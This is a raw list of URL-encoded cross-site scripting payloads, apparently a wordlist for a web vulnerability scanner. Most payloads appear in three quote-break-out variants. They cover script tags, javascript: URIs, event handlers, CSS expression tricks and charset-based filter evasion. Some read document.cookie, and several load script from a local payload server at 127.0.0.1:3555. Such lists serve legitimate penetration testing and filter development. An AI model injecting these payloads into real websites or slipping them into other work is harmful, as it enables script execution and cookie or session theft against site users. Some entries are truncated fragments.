'%3E%3Cmeta%20charset=%22x-imap4-modified-utf7%22%3E&%3Cscript&S1&TS&1%3Ealert&A7&(1)&R&UA;&&%3C&A9&11/script&X&%3E
%3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE
%22%3E%3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE
'%3E%3Cmeta%20charset=%22mac-farsi%22%3E%C2%BCscript%C2%BEjavascript:alert(1)%C2%BC/script%C2%BE
%3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url(
%22%3E%3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url(
'%3E%3Cvmlframe%20xmlns=urn:schemas-microsoft-com:vml%20style=behavior:url(
%2
%3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E
%22%3E%3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E
'%3E%3Ca%20href=%22javascript:javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A%22%3E
%3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22
%22%3E%3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22
'%3E%3Cdiv%20id=%22x%22%3Ex%3C/div%3E%20%3Cxml:namespace%20prefix=%22t%22%3E%20%3Cimport%20namespace=%22t%22%20implementation=%22
%3Cscript%3Ejavascript:alert(1)%3C/script%3E
'%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E
%3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E
%22%3E%3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E
'%3E%3CIMG%20SRC=%22javascript:javascript:alert(1);%22%3E
%3CIMG%20SRC=javascript:javascript:alert(1)%3E
%22%3E%3CIMG%20SRC=javascript:javascript:alert(1)%3E
'%3E%3CIMG%20SRC=javascript:javascript:alert(1)%3E
%3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E
%22%3E%3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E
'%3E%3CIMG%20SRC=%60javascript:javascript:alert(1)%60%3E
%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E
%22%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E
'%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/FRAMESET%3E
%3CBODY%20ONLOAD=javascript:alert(1)%3E
%22%3E%3CBODY%20ONLOAD=javascript:alert(1)%3E
'%3E%3CBODY%20ONLOAD=javascript:alert(1)%3E
%3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E
%22%3E%3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E
'%3E%3CBODY%20ONLOAD=javascript:javascript:alert(1)%3E
%3CIMG%20SRC=%22javascript:javascript:alert(1)%22
%22%3E%3CIMG%20SRC=%22javascript:javascript:alert(1)%22
'%3E%3CIMG%20SRC=%22javascript:javascript:alert(1)%22
%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E
%22%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E
'%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:javascript:alert(1);%22%3E
%3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E
%22%3E%3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E
'%3E%3CIMG%20DYNSRC=%22javascript:javascript:alert(1)%22%3E
%3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E
%22%3E%3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E
'%3E%3CIMG%20LOWSRC=%22javascript:javascript:alert(1)%22%3E
%3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E
%22%3E%3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E
'%3E%3CBGSOUND%20SRC=%22javascript:javascript:alert(1);%22%3E
%3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E
%22%3E%3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E
'%3E%3CBR%20SIZE=%22&%7Bjavascript:alert(1)%7D%22%3E
%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E
%22%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E
'%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:javascript:alert(1);%22%3E
%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX
%22%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX
'%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:javascript:alert(1);%22%3E
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:javascript:alert(1);%22%3E
%3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E
%22%3E%3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E
'%3E%3CIFRAME%20SRC=%22javascript:javascript:alert(1);%22%3E%3C/IFRAME%3E
%3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
%22%3E%3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
'%3E%3CTABLE%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
%22%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
'%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:javascript:alert(1)%22%3E
%3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E
%22%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E
'%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:javascript:alert(1))%22%3E
%3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E
%22%3E%3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E
'%3E%3CDIV%20STYLE=%22width:expression(javascript:alert(1));%22%3E
%3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E
%22%3E%3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E
'%3E%3CIMG%20STYLE=%22X:expr/X/ession(javascript:alert(1))%22%3E
%3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E
%22%3E%3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E
'%3E%3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E
%3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E
%22%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E
'%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E
%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%22%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
'%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E
%22%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E
'%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E
%3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E
%22%3E%3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E
'%3E%3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E
%3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E
%22%3E%3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E
'%3E%3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E
%3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E
%22%3E%3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E
'%3E%3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E
%3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E<IMG%20SRC=%22javas%3C!--%20--%3Ecript:javascript:alert(1)%22>%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22
%22%3E%3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E<IMG%20SRC=%22javas%3C!--%20--%3Ecript:javascript:alert(1)%22>%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22
'%3E%3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E<IMG%20SRC=%22javas%3C!--%20--%3Ecript:javascript:alert(1)%22>%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22
%3CHTML%3E%3CBODY%3E%3C?xml:namespace%20prefix=%22t%22%20ns=%22urn:schemas-microsoft-com:time%22%3E
'%3E%3C?xml:namespace%20prefix=%22t%22%20ns=%22urn:schemas-microsoft-com:time%22%3E%3C?import%20namespace=%22t%22%20implementation=%22
%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE%
%22%3E%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE%
'%3E%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE%
%3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX
%22%3E%3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX
'%3E%3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX
%3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E
%22%3E%3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E
'%3E%3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E
%3CP%20STYLE=%22behavior:url('
%22%3E%3CP%20STYLE=%22behavior:url('
'%3E%3CP%20STYLE=%22behavior:url('
%3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E
%22%3E%3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E
'%3E%3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E
%3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E
%22%3E%3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E
'%3E%3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E
'%3E%3C?xml%20version=%221.0%22?%3E%3Chtml:html%20xmlns:html='http://www.w3.org/1999/xhtml'%3E%3Chtml:script%3Ejavascript:alert(1);%3C/html:script%3E%3C/html:html%3E
%3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E
%22%3E%3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E
'%3E%3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E
%3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E
%22%3E%3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E
'%3E%3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E
%3Cobject%20onerror=javascript:javascript:alert(1)%3E
%22%3E%3Cobject%20onerror=javascript:javascript:alert(1)%3E
'%3E%3Cobject%20onerror=javascript:javascript:alert(1)%3E
%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E
%22%3E%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E
'%3E%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E
%3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E
%22%3E%3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E
'%3E%3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E
%3Ca%20href=%22jav&
%22%3E%3Ca%20href=%22jav&
'%3E%3Ca%20href=%22jav&
%3Ciframe%20srcdoc=%22<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>%3E%22%3E
%22%3E%3Ciframe%20srcdoc=%22<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>%3E%22%3E
'%3E%3Ciframe%20srcdoc=%22<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>%3E%22%3E
alert(String.fromCharCode(75,67,70))//%22;alert(String.fromCharCode(75,67,70))//--
%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3E%3C/SCRIPT%3E
%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3E%3C/SCRIPT%3E
%3CIMG%20SRC=javascript:alert('X')%3E
%22%3E%3CIMG%20SRC=javascript:alert('X')%3E
'%3E%3CIMG%20SRC=javascript:alert('X')%3E
%3CIMG%20SRC=JaVaScRiPt:alert('X')%3E
%22%3E%3CIMG%20SRC=JaVaScRiPt:alert('X')%3E
'%3E%3CIMG%20SRC=JaVaScRiPt:alert('X')%3E
%3CIMG%20SRC=javascript:alert(%22X%22)%3E
%22%3E%3CIMG%20SRC=javascript:alert(%22X%22)%3E
'%3E%3CIMG%20SRC=javascript:alert(%22X%22)%3E
%3CIMG%20SRC=%60javascript:alert(%22X%20says,%20'X'%22)%60%3E
%22%3E%3CIMG%20SRC=%60javascript:alert(%22X%20says,%20'X'%22)%60%3E
'%3E%3CIMG%20SRC=%60javascript:alert(%22X%20says,%20'X'%22)%60%3E
%3Ca%20onmouseover=%22alert(document.cookie)%22%3EX%20link%3C/a%3E
%22%3E%3Ca%20onmouseover=%22alert(document.cookie)%22%3EX%20link%3C/a%3E
'%3E%3Ca%20onmouseover=%22alert(document.cookie)%22%3EX%20link%3C/a%3E
%3Ca%20onmouseover=alert(document.cookie)%3EX%20link%3C/a%3E
%22%3E%3Ca%20onmouseover=alert(document.cookie)%3EX%20link%3C/a%3E
'%3E%3Ca%20onmouseover=alert(document.cookie)%3EX%20link%3C/a%3E
%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22X%22)%3C/SCRIPT%3E%22%3E
%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22X%22)%3C/SCRIPT%3E%22%3E
'%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22X%22)%3C/SCRIPT%3E%22%3E
%3CIMG%20SRC=%20onmouseover=%22alert('X')%22%3E
%22%3E%3CIMG%20SRC=%20onmouseover=%22alert('X')%22%3E
'%3E%3CIMG%20SRC=%20onmouseover=%22alert('X')%22%3E
%3CIMG%20onmouseover=%22alert('X')%22%3E
%22%3E%3CIMG%20onmouseover=%22alert('X')%22%3E
'%3E%3CIMG%20onmouseover=%22alert('X')%22%3E
perl%20-e%20'print%20%22%3CIMG%20SRC=java/0script:alert(/%22X/%22)%3E%22;'%20%3E%20out
%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT/X%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/SCRIPT%3E
%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT/SRC=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/SCRIPT%3E
%3C%3CSCRIPT%3Ealert(%22X%22);//%3C%3C/SCRIPT%3E
%22%3E%3C%3CSCRIPT%3Ealert(%22X%22);//%3C%3C/SCRIPT%3E
'%3E%3C%3CSCRIPT%3Ealert(%22X%22);//%3C%3C/SCRIPT%3E
%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3C%20B%20%3E
%22%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3C%20B%20%3E
'%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js%3C%20B%20%3E
%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3C%20B%20%3E
%22%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3C%20B%20%3E
'%3E%3CSCRIPT%20SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%3C%20B%20%3E
%3CSCRIPT%20SRC=//127.0.0.1:3555/xss_serve_payloads/.j%3E
%22%3E%3CSCRIPT%20SRC=//127.0.0.1:3555/xss_serve_payloads/.j%3E
'%3E%3CSCRIPT%20SRC=//127.0.0.1:3555/xss_serve_payloads/.j%3E
%3CIMG%20SRC=%22javascript:alert('X')%22
%22%3E%3CIMG%20SRC=%22javascript:alert('X')%22
'%3E%3CIMG%20SRC=%22javascript:alert('X')%22
%3C/TITLE%3E%3CSCRIPT%3Ealert(%22X%22);%3C/SCRIPT%3E
%22%3E%3C/TITLE%3E%3CSCRIPT%3Ealert(%22X%22);%3C/SCRIPT%3E
'%3E%3C/TITLE%3E%3CSCRIPT%3Ealert(%22X%22);%3C/SCRIPT%3E
%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:alert('X');%22%3E
%22%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:alert('X');%22%3E
'%3E%3CINPUT%20TYPE=%22IMAGE%22%20SRC=%22javascript:alert('X');%22%3E
%3CBODY%20BACKGROUND=%22javascript:alert('X')%22%3E
%22%3E%3CBODY%20BACKGROUND=%22javascript:alert('X')%22%3E
'%3E%3CBODY%20BACKGROUND=%22javascript:alert('X')%22%3E
%3CIMG%20DYNSRC=%22javascript:alert('X')%22%3E
%22%3E%3CIMG%20DYNSRC=%22javascript:alert('X')%22%3E
'%3E%3CIMG%20DYNSRC=%22javascript:alert('X')%22%3E
%3CIMG%20LOWSRC=%22javascript:alert('X')%22%3E
%22%3E%3CIMG%20LOWSRC=%22javascript:alert('X')%22%3E
'%3E%3CIMG%20LOWSRC=%22javascript:alert('X')%22%3E
%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX%3C/br%3E
%22%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX%3C/br%3E
'%3E%3CSTYLE%3Eli%20%7Blist-style-image:%20url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CUL%3E%3CLI%3EX%3C/br%3E
%3CIMG%20SRC='vbscript:msgbox(%22X%22)'%3E
%22%3E%3CIMG%20SRC='vbscript:msgbox(%22X%22)'%3E
'%3E%3CIMG%20SRC='vbscript:msgbox(%22X%22)'%3E
%3CIMG%20SRC=%22livescript:[code]%22%3E
%22%3E%3CIMG%20SRC=%22livescript:[code]%22%3E
'%3E%3CIMG%20SRC=%22livescript:[code]%22%3E
%3CBODY%20ONLOAD=alert('X')%3E
%22%3E%3CBODY%20ONLOAD=alert('X')%3E
'%3E%3CBODY%20ONLOAD=alert('X')%3E
%3CBGSOUND%20SRC=%22javascript:alert('X');%22%3E
%22%3E%3CBGSOUND%20SRC=%22javascript:alert('X');%22%3E
'%3E%3CBGSOUND%20SRC=%22javascript:alert('X');%22%3E
%3CBR%20SIZE=%22&%7Balert('X')%7D%22%3E
%22%3E%3CBR%20SIZE=%22&%7Balert('X')%7D%22%3E
'%3E%3CBR%20SIZE=%22&%7Balert('X')%7D%22%3E
%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:alert('X');%22%3E
%22%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:alert('X');%22%3E
'%3E%3CLINK%20REL=%22stylesheet%22%20HREF=%22javascript:alert('X');%22%3E
%3CSTYLE%3EBODY%7B-moz-binding:url(%22http://127.0.0.1:3555/xss_serve_payloads/X.xml
%22%3E%3CSTYLE%3EBODY%7B-moz-binding:url(%22http://127.0.0.1:3555/xss_serve_payloads/X.xml
'%3E%3CSTYLE%3EBODY%7B-moz-binding:url(%22http://127.0.0.1:3555/xss_serve_payloads/X.xml
%3CSTYLE%3E@im/port'/ja/vasc/ript:alert(%22X%22)';%3C/STYLE%3E
%22%3E%3CSTYLE%3E@im/port'/ja/vasc/ript:alert(%22X%22)';%3C/STYLE%3E
'%3E%3CSTYLE%3E@im/port'/ja/vasc/ript:alert(%22X%22)';%3C/STYLE%3E
%3CIMG%20STYLE=%22X:expr/X/ession(alert('X'))%22%3E
%22%3E%3CIMG%20STYLE=%22X:expr/X/ession(alert('X'))%22%3E
'%3E%3CIMG%20STYLE=%22X:expr/X/ession(alert('X'))%22%3E
%3CSTYLE%20TYPE=%22text/javascript%22%3Ealert('X');%3C/STYLE%3E
%22%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ealert('X');%3C/STYLE%3E
'%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ealert('X');%3C/STYLE%3E
%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%22%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
'%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert('X')%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:alert('X')%22)%7D%3C/STYLE%3E
%22%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:alert('X')%22)%7D%3C/STYLE%3E
